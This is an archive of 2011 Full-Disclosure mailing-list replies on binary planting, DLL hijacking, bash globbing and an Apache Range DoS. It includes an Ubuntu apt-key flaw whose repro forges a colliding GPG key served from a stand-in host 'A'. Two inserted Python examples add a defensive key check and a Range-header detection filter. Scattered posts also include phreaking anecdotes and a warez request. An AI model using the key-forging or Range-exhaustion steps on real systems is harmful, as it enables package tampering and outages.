 replacing the service executable with malicious one and then
 restarting the service.

 As a restricted user, what's stopping me to do this ?

 Is there any integrity check performed by services.msc or service
 itself before executing with SYSTEM account ?

 Madhur


  Sent from my POS BlackBerry wireless device, which may wipe itself at any moment




  --
 Twitter https://twitter.com/tbiehn | LinkedIn http://www.linkedin.com/in/travisbiehn |
 GitHub http://github.com/tbiehn | http://www.travisbiehn.com

Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread GloW - XD
I agree. I am only talking of the scenario where this service is
pre-installed.

But before it was all about 3rd party addons which run as a service... it is
not happening, i can tell you this from many years of experience with windows,
it won't happen.
MS will not rewrite sdks, ddks, its whole stdafx/msdn architecture for coding,
because of 3rd party addons..
cheers.
xd



On 26 September 2011 11:41, Madhur Ahuja ahuja.mad...@gmail.com wrote:

 I agree. I am only talking of the scenario where this service is
 pre-installed.


 On Monday, September 26, 2011, Thor (Hammer of God) wrote:

  You'd have to be admin to install as a service, and the service would
 obviously need to then be running as local system to be of benefit (beyond
 what a normal user could do anyway) AND the installer would have to grant a
 normal user rights to overwrite it.

  Certainly possible, but the developer would have to go out of their way
 to screw that up. And if they did, it still wouldn't be because of the OS...

  T


 On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote:

   GloW: there's a lot of 3rd party software that installs itself as
 windows services.

  -Travis

 On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote:

 Haha, too good and too true Thor!


 Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get them to execute from a remote share!

  Rofl x10.

 Agreed, this kind of attack is NOT feasible in 2011, try maybe 2006.

 Anyhow it has been a pleasure, ending this BS I think once and for all,
 look up how winlogon works for one thing, then look at how Windows creates
 and maintains a service_table, and then at the DLLs, which are protected ofc,
 you cannot touch msgina.dll without A LOT of help from a rootkit or something
 similar, in which case, why would you need to?
 You could add an admin, hidden, and in a simple .bat file script (yes I do
 have my own code but no it is not for kids..), this is 10 seconds and hidden,
 so when you have gotten that far, why would you bother to hijack a DLL?

 You CANNOT do crap without complete ADMIN not SYSTEM, ADMIN$ share, and
 total access to all sockets, meaning, all pipe control and that's where half of
 Windows exchanges SMB shares for one thing, you guys don't seem to know CRAP
 about Windows to start with, then have the gall to raise such a frigging
 ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this
 being useful, or even just working, and I would look but, you won't, cannot,
 and will never be able to, especially on newer systems of Windows 7-8.
 As I said earlier, enjoy your BS DLL hijacking, but MS don't care for it,
 and whatever patches they instilled don't touch even service_table.. so,
 they have not given it a high prio, and why should they.

 This is simply a case of a secteam gaining notoriety, to try and make this
 a 'big bug!!', to try and gain brownie points from MS. Even though I don't
 believe in many things MS, I know the Windows system, and how to break it,
 better than many people, and I can tell you now, this whole DLL hijack is a
 complete and utter waste of your time.
 But... keep on going, maybe MS will send you another 'thank you' email ;)
 xd / http://crazycoders.com / #haxnet@Ef





 On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com wrote:

  Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get them to execute from a remote share!

 On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

   It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender:




Re: [Full-disclosure] owning ubuntu apt-key net-update (maybe apt-get update related)

2011-09-23 Thread GloW - XD
Aha, sounds like typical (unfortunately), the case of the 'sads' on Ubuntu's
behalf.
 This is what unfortunately stops so many people from reporting, just that
BIT of acknowledgement, even just a thanks on their webpage, but instead
the people think oh well, this guy has probably raped 5000 boxes then
given us this, it must be the approach of some companies, or they have
very pathetic secteams, (in Ubuntu's case, -no comment rofl).
anyhow thx for clearing that up.
cheers,
xd


On 24 September 2011 01:00, Georgi Guninski gunin...@guninski.com wrote:

 On Fri, Sep 23, 2011 at 06:32:10AM +1000, GloW - XD wrote:
  So, this is an exploit then? Or just a broken package? Some people
 would simply not understand that, you're very techy :P
  Anyhow, making a small .sh file for the bug would be cool.. if there is a
  bug to be had.
  cheers
 
 

 hi GloW,

 the bug appears real to me. ubuntu released an advisory [1]
 and debian have a bug [2].

 ubuntu's advisory moderately hurt my narcissistic ego
 by not mentioning my humble name :(

 i suppose they have a corporate policy to give credit to whores only
 (this might be checked by examining which distros give credit
 and which write ``it was discovered'')

 as a minor boost to my narcissistic ego, ubuntu's advisory
 didn't contain CVE(R) ID :)

 next time ubuntu hurts my narcissistic ego, i will try the black market for
 the bug.


 [1]
 https://lists.ubuntu.com/archives/ubuntu-security-announce/2011-September/001424.html
 [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480

 --
 joro


Re: [Full-disclosure] owning ubuntu apt-key net-update (maybe apt-get update related)

2011-09-22 Thread GloW - XD
So, this is an exploit then? Or just a broken package? Some people would
simply not understand that, you're very techy :P
Anyhow, making a small .sh file for the bug would be cool.. if there is a
bug to be had.
cheers


On 22 September 2011 22:03, Georgi Guninski gunin...@guninski.com wrote:

 # grep -rniI 'apt-key' /etc 2>/dev/null
 /etc/cron.daily/apt:444:if eval apt-key net-update $XSTDERR; then
 /etc/cron.daily/apt:445:debug_echo apt-key net-update (success)
 /etc/cron.daily/apt:447:debug_echo apt-key net-update (failure)

 i suppose this effectively breaks vanilla apt-get update after cron is
 helped by MITM.

 the certs were verified to work after installed by apt-key net-update.

 --
 joro

 On Thu, Sep 22, 2011 at 12:07:08PM +0300, Georgi Guninski wrote:
  owning ubuntu apt-key net-update (maybe apt-get update related)
 
  in ubuntu 10.04 in /usr/bin/apt-key in
 add_keys_with_verify_against_master_keyring()
 
  if $GPG_CMD --keyring $ADD_KEYRING --list-sigs --with-colons $add_key | grep ^sig | cut -d: -f5 | grep -q $master_key; then
      $GPG_CMD --quiet --batch --keyring $ADD_KEYRING --export $add_key | $GPG --import
      ADDED=1
 
 
  to my knowledge --list-sigs doesn't do crypto verification, just looks
 for well-formedness.
 
  it is trivial to generate a gpg key with key ID == $master_key:
  set gpg version to 3, set the lowest 64 bits of the RSA $n$ to the key
 ID, generate random high bits until one can trial factor $n$ (numerology is
 on your side), this is it.
 
  to reproduce:
  attached is ubuntu-archive-keyring.gpg.
  put it on http://A/ubuntu-archive-keyring.gpg
  make a copy of apt-key and set:
  ARCHIVE_KEYRING_URI=http://A/ubuntu-archive-keyring.gpg
  ^ this emulates MITM.
  do |./apt-key-new net-update| and check for new keys with |apt-key list|
 
  this might or might not be related with |apt-get update|.
 
  10x.
 
  --
  joro
 



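The key-ID-only test Georgi quotes from apt-key, with a fingerprint-based check beside it, as an added Python example that is not apt-key's or Ubuntu's code. It parses constructed gpg --with-colons listings (record layout as documented in gnupg's doc/DETAILS); the names weak_check and strong_check, the sample fingerprints and the listings are this example's own, and the strong variant assumes the listing came from --check-sigs so that a "!" validity field means gpg verified the signature.

```python
"""Parsing gpg --with-colons output for an apt-key style trust decision.

Added example, not Ubuntu's apt-key. Record layout per gnupg doc/DETAILS:
field 1 record type, field 2 validity ("!" = good signature under
--check-sigs), field 5 the 64-bit key ID, and for "fpr" records field 10
the full fingerprint.
"""
from dataclasses import dataclass, field


@dataclass
class PubKey:
    keyid: str
    fingerprint: str = ""
    sigs: list = field(default_factory=list)  # (validity, signer key ID)


def parse_colons(listing: str) -> list:
    """Group pub/fpr/sig records into PubKey objects (uid records skipped)."""
    keys = []
    for line in listing.splitlines():
        f = line.split(":")
        if len(f) < 5:
            continue
        if f[0] == "pub":
            keys.append(PubKey(keyid=f[4]))
        elif f[0] == "fpr" and keys and len(f) > 9:
            keys[-1].fingerprint = f[9]
        elif f[0] == "sig" and keys:
            keys[-1].sigs.append((f[1], f[4]))
    return keys


def weak_check(listing: str, master_keyid: str) -> bool:
    """Mirror of the quoted pipeline: grep ^sig | cut -d: -f5 | grep -q $master_key.
    Accepts as soon as any sig record's key-ID field contains the master key
    ID. Nothing is verified cryptographically and only 64 bits of key identity
    are compared, so a key with a colliding key ID passes."""
    for line in listing.splitlines():
        f = line.split(":")
        if f[0] == "sig" and len(f) > 4 and master_keyid in f[4]:
            return True
    return False


def strong_check(listing: str, candidate_fpr: str, trusted_fprs: set) -> bool:
    """Accept the candidate key only if it carries a signature gpg marked good
    ("!") AND the signer key ID resolves to exactly one key whose full
    fingerprint is in the trusted set. A key ID shared by keys with different
    fingerprints is a collision and is refused."""
    keys = parse_colons(listing)
    fprs_by_id = {}
    for k in keys:
        fprs_by_id.setdefault(k.keyid, set()).add(k.fingerprint)
    candidate = next((k for k in keys if k.fingerprint == candidate_fpr), None)
    if candidate is None:
        return False
    for validity, signer_id in candidate.sigs:
        if validity != "!":
            continue
        signer_fprs = fprs_by_id.get(signer_id, set())
        if len(signer_fprs) != 1:
            continue  # unknown signer or key-ID collision
        if next(iter(signer_fprs)) in trusted_fprs:
            return True
    return False


# Constructed sample data (not real Ubuntu keys). The forged fingerprint ends
# in the same 16 hex digits as the master's, so both carry the same key ID,
# which is the collision the post describes. The forged self-signature is
# deliberately marked "!" as the worst case for the defender.
MASTER_FPR = "0000111122223333444455556666777788889999"
MASTER_KEYID = MASTER_FPR[-16:]
LEGIT_FPR = "AAAABBBBCCCCDDDDEEEEFFFF0123456789ABCDEF"
FORGED_FPR = "DEADBEEFDEADBEEFDEADBEEF6666777788889999"

LEGIT_LISTING = "\n".join([
    "pub:-:4096:1:%s:1300000000::::::scESC:" % MASTER_KEYID,
    "fpr:::::::::%s:" % MASTER_FPR,
    "uid:-::::1300000000::X::Constructed Master <master@example.invalid>:",
    "sig:!::1:%s:1300000000::::Constructed Master <master@example.invalid>:13x:" % MASTER_KEYID,
    "pub:-:4096:1:%s:1310000000::::::scESC:" % LEGIT_FPR[-16:],
    "fpr:::::::::%s:" % LEGIT_FPR,
    "uid:-::::1310000000::X::Constructed Archive <archive@example.invalid>:",
    "sig:!::1:%s:1310000000::::Constructed Archive <archive@example.invalid>:13x:" % LEGIT_FPR[-16:],
    "sig:!::1:%s:1310000100::::Constructed Master <master@example.invalid>:10x:" % MASTER_KEYID,
])

FORGED_LISTING = "\n".join([
    "pub:-:4096:1:%s:1300000000::::::scESC:" % MASTER_KEYID,
    "fpr:::::::::%s:" % MASTER_FPR,
    "pub:-:2048:1:%s:1320000000::::::scESC:" % MASTER_KEYID,
    "fpr:::::::::%s:" % FORGED_FPR,
    "uid:-::::1320000000::X::Forged <forged@example.invalid>:",
    "sig:!::1:%s:1320000000::::Forged <forged@example.invalid>:13x:" % MASTER_KEYID,
])

if __name__ == "__main__":
    print("weak accepts forged key:", weak_check(FORGED_LISTING, MASTER_KEYID))
    print("strong accepts forged key:", strong_check(FORGED_LISTING, FORGED_FPR, {MASTER_FPR}))
    print("strong accepts legit key:", strong_check(LEGIT_LISTING, LEGIT_FPR, {MASTER_FPR}))
```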
Re: [Full-disclosure] Possibility to exploit bash * processing

2011-09-20 Thread GloW - XD
Probably because anybody who's used the various Bourne-style shells for a
while considers it a feature, not a bug

This seems to be true.
I was able to write a file to root, using a simple cat > cmd or similar, in
BSD 4.11, but when reporting it, Colin Percival seemed to think it more
amusing... they did although patch it being able to write root, as I was
able to write over the passwd file and add myself to it :P
this was a bug, but not a big one according to the lists at the time,
although when you can overwrite root, they might ask you to send them a
private post to bugs@kernel ;P lol.
have fun... that's not much though... write a file now to another dir, then it's
a bug and cat maybe could still, it was only ever patched on BSD...
problem was in Gentoo though also ;)
later and, hope you have fun working with the secteams if you do find a
deeper bug ;p look on BSD mailing lists for a cat bug... it is a few years ago
now but it is there.. I still have the links somewhere but don't have time to
search, just look up the BSD security lists if you need more info about it
or, I could send you the posts from Colin when I am in the office and have
more time.
cheers
xd

oops, sorry I cc'd Valdis, sorry this was aimed at the author more,... don't have
time to correct things I gotta run



On 21 September 2011 04:31, valdis.kletni...@vt.edu wrote:

 On Tue, 20 Sep 2011 13:29:11 +0300, Kirils Solovjovs said:
  Brought this up a year ago. Seems that no attention has been given to
  this so far.

 Probably because anybody who's used the various Bourne-style shells for a
 while considers it a feature, not a bug.  This is a case where the Principle
 of Least Surprise comes up with different answers for novice users and for
 experts: "What? A * can expand into an unintended command argument?" "Yeah,
 what *else* would it do - the shell is just globbing, it doesn't know for
 sure what the command will do with the parameter."

 Multics had an alternate solution for this issue - when you issued a command,
 it would get invoked right then and there and take over terminal input and
 allow guided completions knowing what the command syntax was (think love
 child of getopt and readline ;) Of course, this doesn't play well with pipes,
 especially if the pipe further down the line has a redirection that fails.

  One solution would be to modify * processing so that it ignores
  filenames that start with '-' similarly as it ignores filenames that start
  with '.'

 No, you don't want to do that.  You want to provide an *optional*
 flag, similar to the shopt settings for 'dotglob', 'extglob', 'failglob',
 'globstar', 'nocaseglob', and 'nullglob'.

 Having said that, a 'shopt dashglob' shouldn't be too hard to implement,
 as you can do 98% of it based on the already-existing 'dotglob' code, and
 that's probably the way to address the issue.



Re: [Full-disclosure] Apache Killer

2011-09-13 Thread GloW - XD
Aha this is exactly what me and kcope were discussing, and he pointed out
that size exactly (however he did not know how to replicate to get to it I
think), he mentioned the bucket size being able to be pushed to the exact
amount you just said then, which is alone enough to really wreak some havoc on
things while even using this still within the bounds of the httpd, although I am
guessing if you send a huge amount of the right request, it would cause a
DoS also. I am about to look at your code and hope I haven't just repeated
what you said (again), but you're spot on about where I'm speaking about and
exactly what I meant... the size is the problem which is still underlying
things, if set very high, this consumes more resources on the target... which
can be a persistent attack really until this code is limited or changed, or
a mod made for ranges which handles the ranges and any overflowing or misuse
by local users, this is the biggest problem here, a malicious local user...
I am surprised no one has tried to make this bigger yet, I know that there is
a separate Apache attacking script which was posted (mn.pl) but this did not
have the sufficient pulling power of a Request-Range type attack... which if
done right, I think could still lead to possibly at least a local memory
exhaustion... I don't think it could get as bad as the actual bug was, but
with the range boundaries how they are, and filter settings against things
like 'bytes=' and to monitor if bytes=0-, which is kinda useless, if you use
ByTes= the filter is useless... unless there are some settings made specially
for upper/lower case and even setting spaces in between..
I guess this is still a problem when you have the size of one single bucket
at 2725, and I have heard even higher, that was actually the first reason
this whole thing came about, was the discussions around the size of ONE
container alone, which at that time was about 4850 I believe, around that
figure... so, it has not changed much, or it has not changed at all. I have not
tried to build it in a way that can cause destruction fast, but from what I
did see and read, if set up right, the range function or Request-Range could
eat memory and spit it out like chewing tobacco.
Anyhow, to me it is still partly an issue, I am looking for a way to now
block ALL Request-Range requests, and Range: requests, in BSD 8.2 (stable)
ipfw rules, so I guess this will have to be good to block this, or maybe a
script running alongside Apache to watch the range sizes, but I will still
persist with trying to find a better solution than range fields, or a better
way to receive and handle ALL range requests, it is still not good enough
from a production endpoint, although it might be worth checking the range
filter section and maybe add to it something where it automatically blocks
multiple single digit ex: 5- , 5- , 5- - block it (higher) number requests..
it is not much but it is the only thing which seems to be repetitious to
make any of these attacks now effective, considering the advisory sparked a
tonne of Apache updates which is fine by me, as I watched the damage it did
to a completely unprotected box and my jaw dropped.. but to then know it is
still possible to do almost the same thing, using the same code, well, that's
just not designed right... coders could easily code things within limits of
the ranges which would be set lower if that is a security measure ever used,
then I don't know why it has not been deployed already.
People adapt, computers don't adapt without human intervention..
A trigger to notify/warn of large requests or some halt on requesting until
admin is there, I don't know but there has to be a better way to restrict the
range fields or containers or whatever people are calling it, but to me when
something says bytes= , then that's = data.
I hope that your apachekiller.pl doesn't kill my box too hard, but thanks for
also your interest, and I know many others still hate to admit it but it is
the biggest thing really to hit Apache for a long time, something which forced
a lot of updates, and some boxes may not even be able to have anything more
done than medium patches, or temp fixes, because of just setup or the way
the person has configured things, or it would take them to rebuild their
entire network... this is what has occurred, and many boxes are still just
not tested to it, the first exploit.pl for that was NOT correct because it
involved mod_deflate and mod_gzip which later from kcope's own mouth he said
this was in error, but that code was still enough to do the job for
pentesting.. still, it was not made according to the end advisory, and
should be done that way, so all fields are tested, and all areas of the
httpd are pushed, with some debug action to help people debug their
networks, it would surely not be hard to do this, it is still a problem, and
it won't go away unless the right tools are there to test for it every time,
and yeah sure could maybe add to the code but really, it needed a recode for
pentest
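
A case-insensitive Range / Request-Range check of the kind the post is after (a cap on the number of ranges and rejection of repeated specs like 5-,5-,5-), as an added Python example that is not from the thread, from Apache or from apachekiller.pl; the function names, the sample header sets and the max_ranges policy value are this example's own assumptions.

```python
import re

# Byte-range set, matched case-insensitively and with optional spaces, so
# "ByTes = 0-" is caught as well as "bytes=0-" (the gap the post points at).
_BYTES_SPEC = re.compile(r"^\s*bytes\s*=\s*(?P<set>.+?)\s*$", re.IGNORECASE)
_ONE_RANGE = re.compile(r"^(?P<first>\d*)\s*-\s*(?P<last>\d*)$")

# Apache honoured the obsolete Request-Range header as well as Range, so a
# filter that only looks at one of them is incomplete.
_RANGE_HEADERS = ("range", "request-range")


def parse_byte_ranges(value):
    """Parse a Range/Request-Range value into (first, last) tuples, None for an
    open end. Returns None when the value is not a well-formed byte-range set."""
    m = _BYTES_SPEC.match(value)
    if m is None:
        return None
    ranges = []
    for spec in m.group("set").split(","):
        spec = spec.strip()
        if not spec:
            continue  # empty list elements are tolerated by the grammar
        rm = _ONE_RANGE.match(spec)
        if rm is None or (rm.group("first") == "" and rm.group("last") == ""):
            return None
        first = int(rm.group("first")) if rm.group("first") else None
        last = int(rm.group("last")) if rm.group("last") else None
        ranges.append((first, last))
    return ranges


def range_request_verdict(headers, max_ranges=5):
    """Return (block, reason) for a dict of request headers. Header names are
    compared case-insensitively; max_ranges is an assumed policy value."""
    for name, value in headers.items():
        if name.lower() not in _RANGE_HEADERS:
            continue
        ranges = parse_byte_ranges(value)
        if ranges is None:
            continue  # not a byte-range set; leave it to the server's own parser
        if len(ranges) > max_ranges:
            return True, "%s: %d ranges (limit %d)" % (name, len(ranges), max_ranges)
        if len(set(ranges)) != len(ranges):
            return True, "%s: repeated range specs" % name
    return False, ""


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": {"Host": "example.invalid", "Range": "bytes=0-99,100-199"},
    "mixed_case": {"Request-Range": "ByTes = 0-,1-,2-,3-,4-,5-"},
    "repeated": {"range": "bytes=5-,5-,5-"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(label, range_request_verdict(hdrs))
```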

Re: [Full-disclosure] Full-Disclosure Digest, Vol 79, Issue 6

2011-09-03 Thread GloW - XD
eh, you got the wrong w0rmie. and I don't know what a HF is even.
have a nice day dude, but you have the wrong person.. my nickname has never
been that. either way, show me some proof of this DLL hijacking that's useful,
?? and you would then 'know more' than me.. tell me something I don't
know.
xd

and kid, grow up.


On 3 September 2011 21:16, Tomm Foo bl4kjeebus...@gmail.com wrote:

 what the..? gl0w0rm you dont know shiit bout nothin. keep hollerin at yo
 boys at HF, cause them cats is legit leet, bra.
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

2011-09-02 Thread GloW - XD
but if you execute a trusted vbs, you would successfully exploit anything
wouldn't you?
it would be like running a dll using rundll32.exe my.dll, except a vbs :s

to me makes no sense, never has, and I know what LoadLibrary does, I looked
at the implications of their advisories, I remember when we were swarmed by
about 100 dlls which were not 'unloaded' properly... lol... ok anyhow, this
makes no sense, executing a trusted vbs is 'script', many viruses have been
named .vbs and run VB script... right? so why would we need news on this...
xd


On 3 September 2011 07:53, Nahuel Grisolia nah...@bonsai-sec.com wrote:

 List,

 On 09/02/2011 06:45 PM, root wrote:
  You don't get the worst part: unsuccessful exploitation also leads to
  code execution.
  Scary stuff.
 
  On 09/02/2011 05:05 PM, Mario Vilas wrote:
  Are you guys seriously reporting that double clicking on a malicious
 .vbs
  file could lead to remote code execution? :P
 
  Either I'm missing something (and I'd welcome a rebuttal here!) or you
 might
  as well add .exe to that list. All those extensions are already
 executable.

 I think that they're talking about that executing a trusted vbs could
 lead to the execution of malicious code.

 :S

 regards,
 --
 Nahuel Grisolia - C|EH
 Information Security Consultant
 Bonsai Information Security Project Leader
 http://www.bonsai-sec.com/
 (+54-11) 4777-3107



Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

2011-09-02 Thread GloW - XD
hi, hope you are well,

Prediction 3: Until spammers learn PROPER use of English, things won't change,
the spam will still have spelling errors.

that's about the only thing saving some of us I think...
that's my own observation, and seems to go back to when I was phreaking
'engineering' via telephone, using AT&T PBX cards, to act like a security
engineer at AT&T to get more cards, which lasted many years... the people
who could NOT phish, and relied on the few who could, were all Europeans,
which yes now this has changed.
originally, and in general, the better use of language which is what prevails
with most social engineering in any format and will always continue to,
however, the use of English is also nowadays becoming easier to learn, people
are becoming smarter from each failure, which is why computers' failure rate
dissolves.
Social engineering was the basis of many hackers/black or white, in some
form, many years ago... there is not much documented on it but hey, I'm just
your average Eric Jones.
Anyhow, have a good day sir, interesting topically, in 2011..
cheers,
xd




On 3 September 2011 07:46, valdis.kletni...@vt.edu wrote:

 On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said:

  LOL.  Warning, if you get the user to execute code, then it is possible
  to get the user to execute code!!  All you have to do is get files on their
  system, and then get them to execute those files!   Note that once you
  get the user to execute the code, it will actually run in the context of
  that user!!  This is remote code execution vulnerability!

  Welcome to today's Infosec!

 The sad part is that this is the future of infosec as well.  Microsoft got
 the security religion a few years back, and even I have to admit their
 current stuff isn't that bad at all.  The various Linux distros are (slowly)
 getting their acts together, and maybe even Apple and Adobe will see the
 light sometime reasonably soon. Yes, there will still be software failures -
 but once the effort of finding a new 0-day reaches a certain point, the
 economics change

 And once that happens, social engineering will become an even bigger part
 of both the attack and defense sides of infosec.  For the black hats, the
 cost/benefit of looking for effective 0-day holes will continue to drop,
 while the cost/benefit of phishing a user will remain steady - so that's a
 push towards more social engineering. Why go to the effort of spending 3
 months finding a browser bug that allows you to push malware to the
 victim's machine, when you can just spend 45 minutes creating a "Your
 machine is infected - click here to fix it" pop-up that will catch 80% of
 the people?

 Meanwhile, as the software gets more hardened and patching is more
 automated, the white hats will find a bigger percent of their time is spent
 defending their systems from attacks triggered by their own users.  Because
 the failure rate of people's brains is already about 4.7*10**9 times as
 high as the software failure rate, and the ratio is only getting worse -
 software is improving, people aren't.

 Prediction 1: 10 years from now, organized crime will be hiring cognitive
 psychologists to help design more effective phish the way they currently
 hire programmers to write better spambots.

 Prediction 2: It ain't gonna get better till the average IQ starts going up
 faster than the software improves.




Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

2011-09-02 Thread GloW - XD
I must agree, considering I have yet to see it used in even botnet circles,
who would surely have used a decent local exploit if it was 'decent'... I
know this DLL hijacking has gone unpassed to the community in general
because of its uselessness.
I agree completely, I never have seen this actively exploited, nor part of a
decent framework where it can be used in a remote or local session.
Basically, it is something which I read the PDF on, and thought here is
the most useless 'exploit', as it was being called, I have ever laid eyes
on; my opinion still has yet to be changed by any factor, there could be
many factors, ie: exploitation even in the wild reported, or just someone
saying hey don't forget blah.c!, but this ain't happened, nor will... hey
wanna read MSDN and look and see how a lib is loaded would make more sense.
I still don't see anything 'good' in this whole fiasco of the DLL hijacking.
no active code/PoC. etc etc etc as I said, many factors I'd reconsider my
stance on...
anyhow, enjoyable topic.
xd


On 3 September 2011 11:03, Mario Vilas mvi...@gmail.com wrote:

 I disagree. If this so called vulnerability had any added value in terms
 of social engineering, it would actually make sense to report it. Social
 engineering isn't bad, I really don't care how leet it is. My claim is
 simpler: this advisory makes no sense at all, because it replaces an easy
 way of exploitation for a hard way of exploitation, so its added value is
 actually *negative* for the attacker.

 Most likely whoever found this is new in the infosec world and never
 stopped to consider these details - he/she just blindly repeated what the dll
 injection crowd was doing and posted whatever results were found, without
 understanding really well what was going on.

 And THAT is the state of infosec today. People who report stuff for the
 sake of reporting, without really understanding how things work or why.

 On Fri, Sep 2, 2011 at 11:46 PM, valdis.kletni...@vt.edu wrote:

 On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said:

  LOL.  Warning, if you get the user to execute code, then it is possible
  to get the user to execute code!!  All you have to do is get files on their
  system, and then get them to execute those files!   Note that once you
  get the user to execute the code, it will actually run in the context of
  that user!!  This is remote code execution vulnerability!

  Welcome to today's Infosec!

 The sad part is that this is the future of infosec as well.  Microsoft got
 the security religion a few years back, and even I have to admit their
 current stuff isn't that bad at all.  The various Linux distros are (slowly)
 getting their acts together, and maybe even Apple and Adobe will see the
 light sometime reasonably soon. Yes, there will still be software failures -
 but once the effort of finding a new 0-day reaches a certain point, the
 economics change

 And once that happens, social engineering will become an even bigger part
 of both the attack and defense sides of infosec.  For the black hats, the
 cost/benefit of looking for effective 0-day holes will continue to drop,
 while the cost/benefit of phishing a user will remain steady - so that's a
 push towards more social engineering. Why go to the effort of spending 3
 months finding a browser bug that allows you to push malware to the
 victim's machine, when you can just spend 45 minutes creating a "Your
 machine is infected - click here to fix it" pop-up that will catch 80% of
 the people?

 Meanwhile, as the software gets more hardened and patching is more
 automated, the white hats will find a bigger percent of their time is spent
 defending their systems from attacks triggered by their own users.  Because
 the failure rate of people's brains is already about 4.7*10**9 times as
 high as the software failure rate, and the ratio is only getting worse -
 software is improving, people aren't.

 Prediction 1: 10 years from now, organized crime will be hiring cognitive
 psychologists to help design more effective phish the way they currently
 hire programmers to write better spambots.

 Prediction 2: It ain't gonna get better till the average IQ starts going up
 faster than the software improves.




 --
 “There's a reason we separate military and the police: one fights the enemy
 of the state, the other serves and protects the people. When the military
 becomes both, then the enemies of the state tend to become the people.”




Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-30 Thread GloW - XD
woah!

OK so it is not that nice to deface another product, that's kinda why I do
pick on it myself, but about the GPL,
well I have to help anyone on this one, including TightVNC themselves, as they
did release this as open src software, remember.
Let me try and explain this a bit better/clearer..

Regarding the GPL,
I don't think the guy has breached it directly or indirectly.
Of course, if he has, which I don't think so*, then he would be subject to being
sued by either the TightVNC group, or Metasploit.

IF the INSECT Pro exploit for TightVNC/the code which is used for that, is being
manipulated AT ALL, that is at compile time, if it is modified from the
original code, to the end user/product.
IF that is the case, then TightVNC would be able to scrutinize the INSECT Pro
maker, and perhaps even take it to small claims or worse, direct defamation
of product, which would not be a good/smart thing to do for anyone.

So, I think this should clear up a little of this small debacle which has
broken out about the GPL... the GPL is usually there to protect the src code in the GPL
(named), but is also, not to be used in ways which defame, which is why it
exists.. if TightVNC wanted to now, they could look at ALL its uses and
scrutinize them in every case, and why the code is being used. It is
something which is very much now up to them and up to whether people have
modified their code.
regards,
xd
-

 This isn't a company making a big product, I'm doing this because I like
 doing it.

Good for you. I think that is great. But you are pretending to be a big
company. Stop that.

I am happy to see you removed that silly donation-for-download scheme.

 I'm not forcing you to use my software, if you don't like it please
 don't waste bandwidth on it.

Fantastic advice.

 We are working on a JAVA version in order to support multi-platform,
 and because I really like JAVA

I did too, until I learned how to program. Oracle's purchase/murder also
hastened my departure.

Might I suggest C++/Qt? :-)

Randy

Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-30 Thread GloW - XD
So basically once you sign over a GPL v2, you sign over any right to misuse
even the code which you have written?
I guess I thought this could be scrutinized outside of the GPL via means of
a solicitor but, if the law is complacent about use and misuse then, I guess
that's that and you're correct. I have actually, yes, used myself the CC license
and was thinking the GPL was just a simpler version, but it seems that it is
probably safer to go with CC. I guess there at least you have some say over
misuse in cases where you specify which documents in particular, ie:
sourcecode1.cpp, source2.cpp and v.cpp must not be modified... the rest could
be.., for example.
Oh well, that shoots any theory then of why it is even being mentioned in the
list, other than to potentially harm all users of the TightVNC src.
Stranger things have happened I guess.. Sorry for my earlier report and,
enjoy the code!
lol
xd
cheers Valdis ..




On 31 August 2011 14:14, valdis.kletni...@vt.edu wrote:

 On Wed, 31 Aug 2011 13:36:12 +1000, GloW - XD said:

  So, I think this should clear up a little of this small debacle which has
  broken out about the GPL... the GPL is usually there to protect the src code in the
  GPL (named), but is also, not to be used in ways which defame, which is why it
  exists.. if TightVNC wanted to now, they could look at ALL its uses and
  scrutinize them in every case, and why the code is being used. It is
  something which is very much now up to them and up to whether people have
  modified their code.

 Ahem.  What the GPL V2 actually says:

  6. Each time you redistribute the Program (or any work based on the
 Program), the recipient automatically receives a license from the
 original licensor to copy, distribute or modify the Program subject to
 these terms and conditions.  You may not impose any further
 restrictions on the recipients' exercise of the rights granted herein.
 You are not responsible for enforcing compliance by third parties to
 this License.

 "Not to defame" is an additional restriction, as is "scrutinize why the
 code is being used". You can't do either of those for a GPL-licensed
 package - you may be thinking of some of the Creative Commons licenses.



Re: [Full-disclosure] Telecom/Chat Servers = 2.0.1.1 Blind Exploitation Attack Vulnerability

2011-08-27 Thread GloW - XD

Think you have the wrong person, buddy.
xd


On 27 August 2011 16:26, Xianuro GL xianur0.n...@gmail.com wrote:

 Hey, please do not spoof my email address, thanks xD


Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-27 Thread GloW - XD
hi!
ahhh... awesome stuff :-) I will have a look and see if it is as good as the
author has said it is, thank you.
xd


On 27 August 2011 21:54, Mario Vilas mvi...@gmail.com wrote:

 On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote:

 when is someone going to warez this... it ain't free..


 http://www.insecurityresearch.com/files/

 --
 “There's a reason we separate military and the police: one fights the enemy
 of the state, the other serves and protects the people. When the military
 becomes both, then the enemies of the state tend to become the people.”



Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-26 Thread GloW - XD
when is someone going to warez this... it ain't free.. but since its ad is
here...well, shouldn't we be able to get a copy, thru the warez community :
cheers! waiting on those links to come pourin' in! This tool does sound
great, I just won't pay for a complete app without some form of trial...heck
